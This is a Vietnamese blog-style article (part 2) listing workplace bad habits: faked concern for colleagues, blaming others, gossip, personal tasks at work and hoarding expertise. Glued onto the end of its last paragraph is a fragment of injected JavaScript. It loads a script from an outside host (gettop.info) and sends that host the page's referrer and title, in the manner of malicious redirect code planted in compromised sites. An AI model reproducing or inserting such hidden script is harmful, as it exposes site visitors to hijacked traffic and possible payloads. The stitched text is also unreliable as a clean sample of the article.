Những điều cần tránh nơi công sở ( Phần 2)

 

Không ai là hoàn hảo 100 % cả, có điểm tốt thì cũng sẽ có điểm xấu nào đó. Vấn đề là bạn kịp nhận ra những thói quen xấu cho mình hoàn thiện hơn thôi. Sau đây tôi xin tiếp tục đưa ra những thói xấu hay gặp nơi công sở  để  rút ra bài học kinh nghiệm cho mình để những thói quen xấu đó không còn tồn tại nữa.

 

6.Giả bộ quan tâm người khác

 

gia bo quan tam nguoi khac

 

Không ai muốn mình sống với một người giả tạo , giả vờ làm người tốt. Làm như thế liệu bạn có thoải mái sống một cách vui vẻ ? “Cậu khỏe chứ? Nhà cửa thế nào? Con cái học hành tốt chứ?” – những câu hỏi vồn vã sẽ khiến cho đồng nghiệp cảm động và bộc bạch chuyện cá nhân. Song người hỏi lại nghe một cách lơ đãng hoặc tỏ ra chăm chú nhưng ít hôm sau lại lặp lại những câu hỏi thân tình đầy công thức như vậy khiến đồng nghiệp thất vọng hiểu rằng với câu hỏi đó, họ chỉ cần đáp lại “Ổn cả, ổn cả. Cảm ơn!” là xong.

 

7.Không nhận khi mình sai

 

Bạn làm sai nhưng lai đổ lỗi cho người khác ? Bạn đang chính mình hạ thấp bản thân đấy. Những người chọn cách thức này để chốn tránh trách nhiệm sẽ chỉ khiến cuộc chiến giữa họ và những đồng nghiệp khác ngày càng quyết liệt. Thêm nữa, họ sẽ chẳng bao giờ được coi trọng. Nhận trách nhiệm về mình thay vì việc đổi lỗi cho người khác, luôn phấn đấu hoàn thành tốt công việc sẽ giúp bạn tạo được lòng tin trong đồng nghiệp và lãnh đạo.

 

8.Nói xấu đồng nghiệp

 

Chỉ có ganh ghét đố kị mới nói xấu người khác  nhưng đôi khi cũng chỉ là do vô tình. Trong công ty, mỗi người có một vị trí nhất định nên không ai muốn mất vị trí ấy, từ đó đẻ ra bệnh sĩ diện. Cũng vì sĩ diện, không muốn ai hơn mình mà sinh ra nói xấu nhau.

Nói chuyện tào lao trong giờ làm việc đã là chuyện không nên huống hồ lại là nói xấu đồng nghiệp. Một khi mọi chuyện vỡ lở thì hậu quả sẽ là khôn lường.

 

noi xau

 

 

9.Làm việc riêng

 

Không một người sếp nào bỏ tiền ra để bạn đến chơi, làm việc riêng trong công ty của họ cả.  Ở hầu hết các công sở, nhân viên có thể có một vài tương tác cá nhân trên điện thoại. Tuy nhiên, nếu bạn bè/con cái/bố mẹ/vợ chồng của bạn gọi tới 5 năm lần mỗi ngày, bạn nên có sự điều chỉnh. Lời khuyên tương tự được áp dụng cho việc nhắn tin và sử dụng mạng xã hội.

Với bản chất công việc sử dụng máy tính và internet liên tục, dân công sở khó cưỡng lại những lời mời gọi quyến rũ của những dịch vụ giải trí online phong phú. Trong đó dễ nghiện nhất là game.

 

10.Dấu nghề

 

Dấu nghề thể hiện sự ích kỷ, không muốn người khác hơn mình. Ngoài ra nó còn ảnh hưởng tới kết quả làm việc nhất là khi làm việc với nhóm. Lúc này thì bạn không nên cứ nghĩ thiên về chủ nghĩa cá nhân nữa, nên nhớ, bạn đang làm cho một công ty và phải đặt lợi ích của một công ty lên trên đầu. Những kinh nghiệm của bạn luôn là bài học quí báu cho những người đồng nghiệp. Vì vậy, hãy cứ chia sẻ thông tin, hiệu quả công việc rồi thì sẽ tăng cao.}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *